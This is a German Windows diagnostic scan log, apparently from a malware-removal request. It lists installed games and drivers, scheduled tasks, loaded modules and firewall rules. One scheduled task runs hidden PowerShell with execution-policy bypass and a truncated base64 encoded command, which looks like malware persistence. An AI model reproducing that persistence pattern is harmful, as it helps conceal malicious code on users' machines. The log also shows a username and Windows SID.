Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mount Your Friends (HKLM-x32\...\Steam App 296470) (Version:  - Stegersaurus Software Inc.)
Mozilla Firefox 44.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 de)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MusicBee 2.5 (HKLM-x32\...\MusicBee) (Version: 2.5 - Steven Mayall)
My Game Long Name (HKLM\...\UDK-e526e0d9-5eb7-4e51-9691-3447cc1f95dd) (Version:  - Epic Games, Inc.)
Nuclear Throne (HKLM-x32\...\Steam App 242680) (Version:  - Vlambeer)
NVIDIA 3D Vision Controller-Treiber 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.43 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.43 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.43 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX v8.09.04 (HKLM-x32\...\{A7E07C2B-2220-4415-87E3-784D5814BC93}) (Version: 8.09.04 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Outlast (HKLM-x32\...\Steam App 238320) (Version:  - Red Barrels)
Painkiller: Black Edition (HKLM-x32\...\Steam App 39530) (Version:  - People Can Fly)
Patch testing for Chivalry (HKLM-x32\...\Steam App 232210) (Version:  - )
Project64 1.6 (HKLM-x32\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
Rayman Legends (HKLM-x32\...\Steam App 242550) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Rocket League (HKLM-x32\...\Steam App 252950) (Version:  - Psyonix)
Rogue Legacy (HKLM-x32\...\Steam App 241600) (Version:  - Cellar Door Games)
SEGA Genesis & Mega Drive Classics (HKLM-x32\...\Steam App 34270) (Version:  - Sega)
Serious Sam 2 (HKLM-x32\...\Steam App 204340) (Version:  - Croteam)
Shadow Warrior (HKLM-x32\...\Steam App 233130) (Version:  - Flying Wild Hog)
Shantae and the Pirate's Curse (HKLM-x32\...\Steam App 345820) (Version:  - WayForward)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Slender: The Arrival (HKLM-x32\...\Steam App 252330) (Version:  - Blue Isle Studios)
SOMA (HKLM-x32\...\Steam App 282140) (Version:  - Frictional Games)
Sonic & All-Stars Racing Transformed (HKLM-x32\...\Steam App 212480) (Version:  - Sumo Digital)
Spelunky (HKLM-x32\...\Steam App 239350) (Version:  - )
Spotify (HKU\S-1-5-21-15253450-2137153623-3730132983-1001\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Street Fighter V Beta (HKLM-x32\...\Steam App 386800) (Version:  - )
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version:  - CD PROJEKT RED)
TowerFall Ascension (HKLM-x32\...\Steam App 251470) (Version:  - Matt Thorson)
Ultra Street Fighter IV (HKLM-x32\...\Steam App 45760) (Version:  - Capcom)
Uplay (HKLM-x32\...\Uplay) (Version: 15.0 - Ubisoft)
Viscera Cleanup Detail: Shadow Warrior (HKLM-x32\...\Steam App 255520) (Version:  - RuneStorm)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Volgarr the Viking (HKLM-x32\...\Steam App 247240) (Version:  - Crazy Viking Studios)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Ys: The Oath in Felghana (HKLM-x32\...\Steam App 207320) (Version:  - Nihon Falcom)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-15253450-2137153623-3730132983-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Hanns\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {32BB50D9-B58C-4E57-8200-D3D01A45A033} - System32\Tasks\{79057847-0F05-080F-0B11-0D0D7F09117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (Der Dateneintrag hat 9420 mehr Zeichen).
Task: {34C7A01A-1E96-4BAC-82BB-C8752D512355} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {4782D62F-44F9-4AD2-8143-138D695AA8C8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {9117BB17-5F10-4BFE-8A24-FCA564C04F49} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {C291E239-5AA6-4572-A602-5202AE32A04F} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2015-12-21 22:42 - 2015-12-16 15:54 - 00126256 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-05-19 09:11 - 2015-05-19 09:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2015-12-21 22:45 - 2016-01-12 05:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-12-16 20:57 - 2015-11-22 11:47 - 02653816 _____ () C:\Windows\System32\CoreUIComponents.dll
2015-12-17 22:23 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-17 22:23 - 2015-12-07 05:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 12:46 - 2016-01-05 02:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 12:46 - 2016-01-05 02:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 20:34 - 2016-01-16 06:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 20:34 - 2016-01-16 06:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 02048840 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libglesv2.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll
2015-12-21 22:45 - 2016-01-12 05:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-07-10 23:37 - 2015-07-10 23:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 08:24 - 2015-10-30 08:21 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{1EAC473C-FA1C-426F-BF4C-9AD7909569CE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{803578E2-7173-472C-8E3C-795421980732}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5160117B-5987-49C9-AC37-3ADEFB5C48FB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{18669D97-94B1-4B7F-A7A7-40D2F00024E6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D279C9BA-565A-43E3-AA61-DB5699B3C0D2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E18D7105-2D33-45DD-82B0-18C2AF5B52A0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7E4274BA-9780-4575-9786-395A420E28BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{9937E168-7F72-4592-AC78-402FC3683293}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{257ECA36-9B8D-4B31-9B80-26EBABA8B789}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{7872B1CC-A122-43DD-AB25-EA689B55BF3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{46A9139D-EE95-4484-B24C-72B9CF034F13}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{5F8B7434-C958-4905-B228-FE1A81F6ECC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{B4B45D77-D23E-438C-89BE-B51B4C0DD436}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{70A635E4-4D59-4BFC-9686-33AA74D6EE3E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{1691828A-7230-414D-9A2B-96A9176E98B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{A161CD64-C8FC-4C27-A664-4D5DD65A14AF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{982B0E6B-F295-473E-BB62-74B293CFC41E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{506CFF18-5D3E-4F51-B818-61121AAFDE87}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{EE725E3F-DBBA-4A2F-80A2-2CB834FEEE50}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{CF9D7347-1C1A-4711-97D5-92381DEE8E85}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{F2062B12-8D24-47F3-AEF9-18A095CFB167}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{290FBBF5-15D4-4144-A6A5-4A39BD1CB108}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{A8315A1C-984C-4B9E-8622-2A3703B0A2BF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{FF8B00AB-E516-460F-88C4-FD1C932B0C9C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{DD708F10-099E-48F1-8D91-7EA16BDCD204}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{5D48DAA4-77C9-458B-8385-83A900D778C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{0E7C3D47-9652-495E-9012-3D9B943DAE20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{D807ED96-9674-405B-9178-2318ED5D9179}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{805DE47A-E42A-48C2-9BAD-F4E1452F3AF9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{EDE5355E-3A91-4C12-9F8C-D30A6376D16F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{E0B46C94-26AE-416E-8E8F-72795DD4BF7C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D60F6E29-44B1-4DC9-97BC-B23DB52EAC31}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{99E37BF6-B623-475E-903F-F9C18C402273}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EAA71475-41CD-4245-9F8C-8D75FAFBA2CB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{6684695F-D8F7-40DA-BABC-BAA9ECD0FA21}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{25293322-9D21-4807-9474-5AC9D524CC2A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EAB18391-1B99-43E7-A624-A155122A6243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{478BF737-6D3D-444C-AFF8-8ACB567BA386}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B0316446-E2B3-4023-90A4-9C913ECEF809}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B6AED1C1-2ECF-4221-940E-7E43EE4F6289}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{FF0ADBD9-F73A-4D25-B8F4-57BC0F59CE49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{4AAC31BB-AE24-4B62-B064-7E84922580FC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{20C6F0FB-7F37-47EF-9257-95C87D81E3E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{8D62E2AC-1CF4-4630-B7F6-5EAB1308B507}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0F7E170C-7FB4-40AB-8C5E-BBF29D23F042}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0CE63CE1-90DD-43C2-B8CF-EA2D677523B5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{B0A95B04-B7CF-4A8A-B0F3-3F3D5162C17A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{6CAEB51F-21B5-48BF-979D-06BBA4DEF07D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{57D5B383-DFB1-48D6-8441-B65CFA108F23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{9FBBB253-DF80-4DC0-A142-528F24610303}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{ADF3B96F-78D2-4F33-9399-B32843827D36}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{84B65B46-BF39-4D4E-A34E-439951CCF71C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{4F2D3197-EDA1-4AC7-8A67-C1E46D5E9587}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{00EBE37B-BD76-424D-AD77-92F18698F1F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{8A9C04CA-9DFF-45E7-9DCC-A5FE4401EB83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{127DBEC5-737E-4E8C-BC9B-3ABD75CF8B96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{192A8CFD-6765-412E-AD7B-AC3E1D140A5E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2927A427-5D16-4590-9E1D-C1539535ADE4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [{920E24AA-B09E-4601-BF0C-AC4AF32D4C4A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [TCP Query User{F2655CC9-7E76-4CC5-B393-506892F115AF}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{426B7B55-D2B0-4452-8325-9597BA91446F}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [{342FB7C4-2925-43EF-AB67-F37599A91051}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{BFEB411E-ABE3-4542-B2DC-E029F9140093}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{14EAA340-3C9F-4E93-B7DD-0C047AF4867F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{CFEDE40F-1AA8-4807-939F-41042FFB4D27}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{8FB0C75B-D040-44C6-86CB-4A613BF879C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{4B9BA1BB-6123-4D2C-A11A-384CE786E33D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{D9ACFBBC-12E9-4DE0-B2ED-3C719B332E72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{D12B63F9-4E74-4C48-BCD2-7E4591BBFB52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{17711669-CD6D-40E5-ACD1-8EC9FCE6D06D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{B53E91E7-7D7E-4DC4-84A2-4695B47B790D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{785F5761-7C62-47C4-93F0-C3AAE808C6D2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{4AD68999-7154-4205-9AAD-F265DF9DC595}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{F5D7ACD7-A77E-48C6-BB3E-ABE979E1A26D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{C5E2AE19-D8AC-4819-A5D8-4AD6BB435966}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{DC0218AF-50B6-4526-B46F-155DC21A92A9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{0A93A914-348B-4551-8FDE-E60695AAF630}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{3A2F1D8D-2623-4493-93FB-F5DE5C93FB55}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{5F6E9EC8-6D79-4B46-A0F1-B28C90E696D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{0EA5B637-0DA7-4A97-8E85-5CD79888CE8A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{EF2C9179-69BC-4DC9-AF01-B304AACD6A5B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{AAF74500-FA72-436C-9D90-A7884E733935}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{C817C1A0-9BE0-418C-A79D-0924F3652977}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
